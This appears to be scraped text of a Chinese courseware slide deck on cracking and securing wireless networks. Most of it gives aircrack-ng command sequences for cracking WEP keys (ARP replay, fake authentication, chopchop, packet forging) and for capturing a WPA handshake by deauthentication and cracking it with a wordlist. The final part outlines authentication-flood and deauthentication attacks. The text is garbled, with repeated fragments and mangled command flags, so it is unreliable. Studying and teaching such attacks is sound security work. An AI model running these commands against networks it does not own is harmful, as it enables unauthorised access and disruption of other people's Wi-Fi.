【电脑知识】无线的破解与安全课件

1、提纲相关背景WEP的破解（1）WPA的破解无线安全docin/sundae_meng相关背景无线网卡的选择芯片。Athetos ，Prism，Ralink （USB）无线网卡的硬件/固件版本无线网卡的功率及规格基本知识SSID（Service Set Identifier,服务集标识符） 一个唯一的标识符，最大长度32WAP（wireless Application Protocol，无线应用协议）AP(wireless Access Point) 无线接入点docin/sundae_meng相关背景几个比较好的无线破解系统（Linux）BackTrackWiFiSlaxWiFiWayLinu

2、x系统下无线探测工具Kismet（Bt4自带）Wicrawl（扩展功能较好）AirSnort（具有自动抓包并破解WEP的能力）Bt4下使用iwlist或者docin/sundae_meng相关背景几个比较出名linux系统BackTrackWiFiSlaxWiFiWayLinux系统下无线探测工具Kismet（Bt4自带）Wicrawl（扩展功能较好）AirSnort（具有自动抓包并破解WEP的能力）Bt4下使用iwlist或者Internet-Wicd Network Managerdocin/sundae_meng相关背景几个比较出名linux系统BackTrackWiFiSlaxWiFi

3、WayLinux系统下无线探测工具Kismet（Bt4自带）Wicrawl（扩展功能较好）AirSnort（具有自动抓包并破解WEP的能力）Bt4下使用iwlist或者Internet-Wicd Network Managerdocin/sundae_mengWEP破解技术（1）Ifconfig a wlan0 up载入无线网卡的驱动程序首先要在vmware中连接探测无线AP的信息airmon-ng start wlan0 监控频道成功后会开启一个监控网卡，如 mon0airodumpng w dump channel 6 mon0aireplay-ng -3 b aps MAC h clie

4、nts MAC x 1024 mon0 aircrack-ng x f 2 dump-01.capdocin/sundae_mengWEP破解技术（2）Ifconfig a wlan0 up载入无线网卡的驱动程序首先要在vmware中连接探测无线AP的信息airmon-ng start wlan0 监控频道成功后会开启一个监控网卡，如 mon0airodump ng ivs c 监控频道w dump channel 6 mon0aireplay-ng -1 0 e aps essid aps MAC h clients MAC (网卡) x mon0 docin/sundae_mengWEP破

5、解技术（2）aireplay-ng -4 b APs MAC h clients MAC mon0Chopchop 攻击生产可用的密钥数据流文件会生产一个cap和一个xor的文件packetforge-ng o a APMAC h clients MAC -k 255.255.255.255 -1 255.255.255.255 y fragment xor file w dump1airepaly-ng -2 r dump1 mon0aircrack-ng dump*.ivsdocin/sundae_mengWAP破解技术airmon-ng start wlan0没有正常的加载驱动airod

6、ump-ng -w dump channel 频道 mon0Dump为数据包aireplay-ng -o 攻击次数 APs MAC h clients MAC mon0WPA握手的验证zcat /pentest/password/dictionaries/ wordlist.txt.Z password.txt生产字典（bt4 自带）aircrack-ng w password.txt -z dump01.cap破解docin/sundae_mengWEP破解流程docin/sundae_meng无线的安全docin/sundae_meng身份验证洪泛攻击攻击原理关联的客户端向AP发送大量伪造身份验证请求当请求超出AP的承载能力时断开与客户的连接攻击实现使用看似合法的但是随机生成MAC伪造工作站向AP发送大量的虚假请求docin/sundae_meng身份验证失败攻击攻击原理关联的客户端向AP伪造客户端无效验证帧AP将受害客户端更新为状态1攻击实现关联客户端伪造某合法客户端向AP发送无效的验证帧AP认为该验证请求无效将受害者的状